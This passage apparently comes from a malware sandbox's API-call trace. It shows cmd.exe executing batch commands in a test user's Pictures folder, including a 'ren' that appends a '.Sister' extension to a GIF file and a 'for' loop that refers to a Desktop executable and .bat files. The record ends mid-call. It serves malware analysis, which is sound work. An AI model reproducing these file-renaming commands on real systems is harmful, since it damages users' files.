(nStdHandle=0xfffffff5) returned 0x50 [0292.572] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe248 | out: lpMode=0xa6cf4fe248) returned 1 [0292.572] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.572] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe288, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe288*=0x2) returned 1 [0292.577] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures") returned 0x18 [0292.577] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe2c8 | out: _Buffer="C:\\Users\\FD1HVy\\Pictures") returned 24 [0292.577] _vsnwprintf (in: _Buffer=0x21ed8e80190, _BufferCount=0x83cd, _Format="%c", _ArgList=0xa6cf4fe2c8 | out: _Buffer=">") returned 1 [0292.577] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.577] GetFileType (hFile=0x50) returned 0x2 [0292.577] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0292.577] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe278 | out: lpMode=0xa6cf4fe278) returned 1 [0292.579] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.579] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0xa6cf4fe2b8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe2b8*=0x19) returned 1 [0292.580] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.580] GetFileType (hFile=0x50) returned 0x2 [0292.580] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0292.580] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0292.580] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.580] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8d55ef0*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed8d55ef0*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0292.581] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"CBqE_ptIfCfIXOkQ.gif\" \"CBqE_ptIfCfIXOkQ.gif.Sister\" ") returned 54 [0292.581] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.581] GetFileType (hFile=0x50) returned 0x2 [0292.581] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0292.582] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0292.582] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.582] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x36, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x36) returned 1 [0292.583] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe558 | out: _Buffer=" & ") returned 3 [0292.583] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.583] GetFileType (hFile=0x50) returned 0x2 [0292.583] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0292.583] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0292.583] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.583] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0292.584] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%.3s", _ArgList=0xa6cf4fe528 | out: _Buffer="for") returned 3 [0292.584] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.584] GetFileType (hFile=0x50) returned 0x2 [0292.584] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0292.584] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0292.585] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.585] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x3) returned 1 [0292.585] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" %a in ") returned 7 [0292.585] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.585] GetFileType (hFile=0x50) returned 0x2 [0292.585] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0292.586] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0292.586] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.587] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x7) returned 1 [0292.587] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="(%s) %s ", _ArgList=0xa6cf4fe528 | out: _Buffer="(\"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe\") do ") returned 85 [0292.587] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.587] GetFileType (hFile=0x50) returned 0x2 [0292.588] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0292.588] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0292.589] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.589] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x55, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x55) returned 1 [0292.595] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.595] GetFileType (hFile=0x50) returned 0x2 [0292.595] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0292.595] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0292.595] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.595] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8d563a0*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed8d563a0*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0292.596] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"CBqE_ptIfCfIXOkQ.gif.Sister\" \"CBqE_ptIfCfIXOkQ.bat\" ") returned 54 [0292.596] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.596] GetFileType (hFile=0x50) returned 0x2 [0292.596] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0292.596] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0292.597] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.597] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x36, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x36) returned 1 [0292.597] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe5b8 | out: _Buffer="\r\n") returned 2 [0292.597] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.597] GetFileType (hFile=0x50) returned 0x2 [0292.597] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0292.597] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0292.598] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.598] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x2) returned 1 [0292.604] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fe240, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0292.606] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0292.606] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0292.606] malloc (_Size=0xffce) returned 0x21ed97dfbc0 [0292.606] ??_V@YAXPEAX@Z () returned 0x21ed97dfbc0 [0292.606] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0292.606] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0292.606] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0292.606] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0292.606] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0292.606] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0292.606] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0292.606] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0292.606] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0292.606] ??_V@YAXPEAX@Z () returned 0x1 [0292.607] GetProcessHeap () returned 0x21ed8c70000 [0292.607] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xe8) returned 0x21ed8c95d80 [0292.607] GetProcessHeap () returned 0x21ed8c70000 [0292.607] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c95d80, Size=0x7c) returned 0x21ed8c95d80 [0292.607] GetProcessHeap () returned 0x21ed8c70000 [0292.607] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c95d80) returned 0x7c [0292.607] GetProcessHeap () returned 0x21ed8c70000 [0292.607] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x84) returned 0x21ed93790c0 [0292.607] GetProcessHeap () returned 0x21ed8c70000 [0292.607] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xe8) returned 0x21ed8c95e10 [0292.607] GetProcessHeap () returned 0x21ed8c70000 [0292.607] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c95e10, Size=0x7c) returned 0x21ed8c95e10 [0292.607] GetProcessHeap () returned 0x21ed8c70000 [0292.607] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c95e10) returned 0x7c [0292.607] malloc (_Size=0xffce) returned 0x21ed97dfbc0 [0292.608] ??_V@YAXPEAX@Z () returned 0x21ed97dfbc0 [0292.608] GetProcessHeap () returned 0x21ed8c70000 [0292.608] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8c7d060 [0292.608] GetProcessHeap () returned 0x21ed8c70000 [0292.608] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed8d31ed0 [0292.608] _wcsicmp (_String1="CBqE_ptIfCfIXOkQ.gif", _String2=".") returned 53 [0292.608] _wcsicmp (_String1="CBqE_ptIfCfIXOkQ.gif", _String2="..") returned 53 [0292.608] GetFileAttributesW (lpFileName="CBqE_ptIfCfIXOkQ.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\cbqe_ptifcfixokq.gif")) returned 0x20 [0292.608] GetProcessHeap () returned 0x21ed8c70000 [0292.608] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed8c96f40 [0292.610] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8c96f50 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures") returned 0x18 [0292.610] SetErrorMode (uMode=0x0) returned 0x0 [0292.610] SetErrorMode (uMode=0x1) returned 0x0 [0292.610] GetFullPathNameW (in: lpFileName="CBqE_ptIfCfIXOkQ.gif", nBufferLength=0x7fe7, lpBuffer=0x21ed97dfbc0, lpFilePart=0xa6cf4fd660 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\CBqE_ptIfCfIXOkQ.gif", lpFilePart=0xa6cf4fd660*="CBqE_ptIfCfIXOkQ.gif") returned 0x2d [0292.610] SetErrorMode (uMode=0x0) returned 0x1 [0292.611] GetProcessHeap () returned 0x21ed8c70000 [0292.611] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed8d30dc0 [0292.611] _wcsicmp (_String1="CBqE_ptIfCfIXOkQ.gif", _String2=".") returned 53 [0292.611] _wcsicmp (_String1="CBqE_ptIfCfIXOkQ.gif", _String2="..") returned 53 [0292.611] GetFileAttributesW (lpFileName="CBqE_ptIfCfIXOkQ.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\cbqe_ptifcfixokq.gif")) returned 0x20 [0292.611] ??_V@YAXPEAX@Z () returned 0x1 [0292.611] malloc (_Size=0xffce) returned 0x21ed97dfbc0 [0292.611] ??_V@YAXPEAX@Z () returned 0x21ed97dfbc0 [0292.611] malloc (_Size=0xffce) returned 0x21ed97efba0 [0292.611] ??_V@YAXPEAX@Z () returned 0x21ed97efba0 [0292.611] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\CBqE_ptIfCfIXOkQ.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\cbqe_ptifcfixokq.gif")) returned 0x20 [0292.611] malloc (_Size=0xffce) returned 0x21ed97ffb80 [0292.611] ??_V@YAXPEAX@Z () returned 0x21ed97ffb80 [0292.612] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\CBqE_ptIfCfIXOkQ.gif", fInfoLevelId=0x1, lpFindFileData=0x21ed8d31ee0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x21ed8d31ee0) returned 0x21ed8c7c9a0 [0292.612] malloc (_Size=0xffce) returned 0x21ed980fb60 [0292.612] ??_V@YAXPEAX@Z () returned 0x21ed980fb60 [0292.613] ??_V@YAXPEAX@Z () returned 0x1 [0292.613] MoveFileWithProgressW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\CBqE_ptIfCfIXOkQ.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\cbqe_ptifcfixokq.gif"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\CBqE_ptIfCfIXOkQ.gif.Sister" (normalized: "c:\\users\\fd1hvy\\pictures\\cbqe_ptifcfixokq.gif.sister"), lpProgressRoutine=0x0, lpData=0x0, dwFlags=0x2) returned 1 [0292.615] FindNextFileW (in: hFindFile=0x21ed8c7c9a0, lpFindFileData=0x21ed8d31ee0 | out: lpFindFileData=0x21ed8d31ee0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x61adacc0, ftCreationTime.dwHighDateTime=0x1d5e1c0, ftLastAccessTime.dwLowDateTime=0x77878d60, ftLastAccessTime.dwHighDateTime=0x1d5ee34, ftLastWriteTime.dwLowDateTime=0x77878d60, ftLastWriteTime.dwHighDateTime=0x1d5ee34, nFileSizeHigh=0x0, nFileSizeLow=0xfa3, dwReserved0=0x0, dwReserved1=0x0, cFileName="CBqE_ptIfCfIXOkQ.gif", cAlternateFileName="")) returned 0 [0292.616] GetLastError () returned 0x12 [0292.617] FindClose (in: hFindFile=0x21ed8c7c9a0 | out: hFindFile=0x21ed8c7c9a0) returned 1 [0292.618] ??_V@YAXPEAX@Z () returned 0x1 [0292.618] ??_V@YAXPEAX@Z () returned 0x1 [0292.618] ??_V@YAXPEAX@Z () returned 0x1 [0292.618] ??_V@YAXPEAX@Z () returned 0x1 [0292.618] GetProcessHeap () returned 0x21ed8c70000 [0292.618] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8c7cb20 [0292.618] GetProcessHeap () returned 0x21ed8c70000 [0292.618] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c95840, Size=0x16) returned 0x21ed8c95680 [0292.619] GetProcessHeap () returned 0x21ed8c70000 [0292.619] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c95680) returned 0x16 [0292.619] GetProcessHeap () returned 0x21ed8c70000 [0292.619] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d45bf0, Size=0x20) returned 0x21ed8d45cb0 [0292.619] GetProcessHeap () returned 0x21ed8c70000 [0292.619] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d45cb0) returned 0x20 [0292.619] GetProcessHeap () returned 0x21ed8c70000 [0292.619] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x150) returned 0x21ed8d6b560 [0292.619] GetProcessHeap () returned 0x21ed8c70000 [0292.619] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d6b560, Size=0xb2) returned 0x21ed8c96c40 [0292.619] GetProcessHeap () returned 0x21ed8c70000 [0292.619] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c96c40) returned 0xb2 [0292.619] GetProcessHeap () returned 0x21ed8c70000 [0292.619] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed937ab00 [0292.620] GetProcessHeap () returned 0x21ed8c70000 [0292.620] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed937ab00, Size=0x30) returned 0x21ed937ab00 [0292.620] GetProcessHeap () returned 0x21ed8c70000 [0292.620] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed937ab00) returned 0x30 [0292.620] GetProcessHeap () returned 0x21ed8c70000 [0292.620] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed937ab40 [0292.620] malloc (_Size=0x1ff9c) returned 0x21ed97dfbc0 [0292.620] GetProcessHeap () returned 0x21ed8c70000 [0292.620] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed8c96700 [0292.620] GetProcessHeap () returned 0x21ed8c70000 [0292.620] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xac) returned 0x21ed8c96340 [0292.620] ??_V@YAXPEAX@Z () returned 0x1 [0292.620] malloc (_Size=0x1ff9c) returned 0x21ed97dfbc0 [0292.620] GetProcessHeap () returned 0x21ed8c70000 [0292.620] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed8c96d00 [0292.620] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", nBufferLength=0xffce, lpBuffer=0x21ed97dfbc0, lpFilePart=0xa6cf4fdd08 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFilePart=0xa6cf4fdd08*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe") returned 0x4d [0292.621] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd8c95e60, cFileName="Users", cAlternateFileName="")) returned 0x21ed8c7cf40 [0292.621] FindClose (in: hFindFile=0x21ed8c7cf40 | out: hFindFile=0x21ed8c7cf40) returned 1 [0292.621] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd8c95e60, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8c7cfa0 [0292.621] FindClose (in: hFindFile=0x21ed8c7cfa0 | out: hFindFile=0x21ed8c7cfa0) returned 1 [0292.621] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd623d33f, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xd623d33f, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd8c95e60, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed8c7cbe0 [0292.622] FindClose (in: hFindFile=0x21ed8c7cbe0 | out: hFindFile=0x21ed8c7cbe0) returned 1 [0292.622] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd623d33f, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xd623d33f, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd8c95e60, cFileName="Desktop", cAlternateFileName="")) returned 0xffffffffffffffff [0292.622] malloc (_Size=0x1ff9c) returned 0x21ed97ffb70 [0292.622] ??_V@YAXPEAX@Z () returned 0x21ed97ffb70 [0292.622] GetProcessHeap () returned 0x21ed8c70000 [0292.622] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x74) returned 0x21ed8d672b0 [0292.622] ??_V@YAXPEAX@Z () returned 0x1 [0292.622] ??_V@YAXPEAX@Z () returned 0x1 [0292.622] GetProcessHeap () returned 0x21ed8c70000 [0292.622] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed937ab40, Size=0x490) returned 0x21ed937ab40 [0292.623] GetProcessHeap () returned 0x21ed8c70000 [0292.623] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed937ab40) returned 0x490 [0292.623] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fddc8 | out: _Buffer="\r\n") returned 2 [0292.623] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.623] GetFileType (hFile=0x50) returned 0x2 [0292.623] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0292.623] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd58 | out: lpMode=0xa6cf4fdd58) returned 1 [0292.624] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.624] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fdd98, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fdd98*=0x2) returned 1 [0292.632] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures") returned 0x18 [0292.632] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fddd8 | out: _Buffer="C:\\Users\\FD1HVy\\Pictures") returned 24 [0292.632] _vsnwprintf (in: _Buffer=0x21ed8e80190, _BufferCount=0x83cd, _Format="%c", _ArgList=0xa6cf4fddd8 | out: _Buffer=">") returned 1 [0292.632] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.632] GetFileType (hFile=0x50) returned 0x2 [0292.632] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0292.632] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd88 | out: lpMode=0xa6cf4fdd88) returned 1 [0292.632] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.633] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0xa6cf4fddc8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fddc8*=0x19) returned 1 [0292.633] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.633] GetFileType (hFile=0x50) returned 0x2 [0292.633] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0292.633] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0292.634] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.634] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed937ab10*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x21ed937ab10*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x3) returned 1 [0292.634] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe098 | out: _Buffer=" \"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister\" \"CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.bat\" ") returned 144 [0292.634] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.634] GetFileType (hFile=0x50) returned 0x2 [0292.634] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0292.634] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe028 | out: lpMode=0xa6cf4fe028) returned 1 [0292.636] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.636] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x90, lpNumberOfCharsWritten=0xa6cf4fe068, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe068*=0x90) returned 1 [0292.640] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe0c8 | out: _Buffer="\r\n") returned 2 [0292.640] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.640] GetFileType (hFile=0x50) returned 0x2 [0292.640] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0292.640] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0292.641] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.641] WriteConsoleW (in: hConsoleOutput=0x50, 